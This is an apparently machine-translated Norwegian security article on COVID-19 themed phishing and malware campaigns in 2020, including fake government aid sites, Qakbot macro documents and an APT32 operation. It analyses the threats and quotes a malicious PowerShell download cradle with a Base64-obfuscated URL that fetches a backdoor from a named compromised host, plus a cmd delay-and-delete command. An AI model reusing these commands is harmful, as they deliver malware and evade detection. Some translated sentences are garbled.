Angripere fortsetter å utnytte COVID-19-emnet, og skaper flere og flere trusler for brukere som er svært interessert i alt relatert til epidemien. I Vi har allerede snakket om hvilke typer skadelig programvare som dukket opp i kjølvannet av koronaviruset, og i dag vil vi snakke om sosiale ingeniørteknikker som brukere i forskjellige land, inkludert Russland, allerede har møtt. Generelle trender og eksempler er under kuttet.
Husk inn Vi snakket om det faktum at folk er villige til å lese ikke bare om koronaviruset og epidemiens forløp, men også om økonomiske støttetiltak? Her er et godt eksempel. Et interessant phishing-angrep ble oppdaget i den tyske delstaten Nordrhein-Westfalen eller NRW. Angriperne laget kopier av økonomidepartementets nettsted (), hvor alle kan søke om økonomisk bistand. Et slikt program eksisterer faktisk, og det viste seg å være gunstig for svindlere. Etter å ha mottatt personopplysningene til ofrene deres, sendte de en søknad på nettstedet til det virkelige departementet, men angav andre bankdetaljer. I følge offisielle data ble 4 tusen slike falske forespørsler gjort frem til ordningen ble oppdaget. Som et resultat falt 109 millioner dollar beregnet på berørte borgere i hendene på svindlere.
Vil du ha en gratis test for COVID-19?
Et annet viktig eksempel på phishing med koronavirus-tema var i e-poster. Meldingene vakte oppmerksomhet fra brukere med et tilbud om å gjennomgå gratis testing for koronavirusinfeksjon. I vedlegget til disse det var tilfeller av Trickbot/Qakbot/Qbot. Og da de som ønsket å sjekke helsen deres begynte å "fylle ut det vedlagte skjemaet", ble et ondsinnet skript lastet ned til datamaskinen. Og for å unngå sandkassetesting begynte skriptet å laste ned hovedviruset først etter en stund, da beskyttelsessystemene var overbevist om at ingen ondsinnet aktivitet ville forekomme.
Det var også enkelt å overbevise de fleste brukere om å aktivere makroer. For å gjøre dette ble et standardtriks brukt: for å fylle ut spørreskjemaet, må du først aktivere makroer, noe som betyr at du må kjøre et VBA-skript.
Som du kan se, er VBA-skriptet spesielt maskert fra antivirus.
Windows har en ventefunksjon der applikasjonen venter /T <sekunder> før den godtar standard "Ja"-svar. I vårt tilfelle ventet skriptet 65 sekunder før de slettet midlertidige filer:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Og mens du ventet, ble skadelig programvare lastet ned. Et spesielt PowerShell-skript ble lansert for dette:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Etter dekoding av Base64-verdien, laster PowerShell-skriptet ned bakdøren som ligger på den tidligere hackede webserveren fra Tyskland:
http://automatischer-staubsauger.com/feature/777777.pngog lagrer den under navnet:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’ slettes når du kjører 'tmps1.bat'-filen som inneholder kommandoen cmd /c mkdir ""C:UsersPublictmpdir"".
Målrettet angrep på offentlige etater
I tillegg rapporterte FireEye-analytikere nylig om et målrettet APT32-angrep rettet mot regjeringsstrukturer i Wuhan, samt det kinesiske beredskapsdepartementet. En av de distribuerte RTF-ene inneholdt en lenke til en New York Times-artikkel med tittelen . Etter å ha lest den ble det imidlertid lastet ned skadelig programvare (FireEye-analytikere identifiserte forekomsten som METALJACK).
Interessant nok oppdaget ingen av antivirusene denne forekomsten på tidspunktet for oppdagelsen, ifølge Virustotal.
Når offisielle nettsider er nede
Det mest slående eksemplet på et phishing-angrep skjedde i Russland forleden dag. Bakgrunnen for dette var oppnevning av en etterlengtet ytelse for barn i alderen 3 til 16 år. Da starten på å akseptere søknader ble annonsert 12. mai 2020, skyndte millioner seg inn på nettsiden til Statens tjenester for den etterlengtede hjelpen og brakte portalen ikke verre enn et profesjonelt DDoS-angrep. Da presidenten sa at "Offentlige tjenester ikke kunne takle strømmen av søknader," begynte folk å snakke på nettet om lanseringen av et alternativt nettsted for å akseptere søknader.
Problemet er at flere nettsteder begynte å fungere samtidig, og mens en, den virkelige på posobie16.gosuslugi.ru, faktisk godtar søknader, mer .
Kolleger fra SearchInform fant rundt 30 nye uredelige domener i .ru-sonen. Infosecurity og Softline Company har sporet mer enn 70 lignende falske offentlige tjenestenettsteder siden begynnelsen av april. Skaperne deres manipulerer kjente symboler og bruker også kombinasjoner av ordene gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, og så videre.
Hype og sosial ingeniørkunst
Alle disse eksemplene bekrefter bare at angripere lykkes med å tjene penger på temaet koronavirus. Og jo høyere sosial spenning og jo mer uklare problemstillinger, jo større sjanse har svindlere til å stjele viktige data, tvinge folk til å gi opp pengene sine på egen hånd, eller rett og slett hacke flere datamaskiner.
Og gitt at pandemien har tvunget potensielt uforberedte mennesker til å jobbe hjemmefra i massevis, er ikke bare personlige, men også bedriftsdata i fare. For eksempel ble Microsoft 365-brukere (tidligere Office 365) nylig også utsatt for et phishing-angrep. Folk mottok massive «glippede» talemeldinger som vedlegg til brev. Imidlertid var filene faktisk en HTML-side som sendte ofre for angrepet til . Som et resultat tap av tilgang og kompromittering av alle data fra kontoen.
Kilde: www.habr.com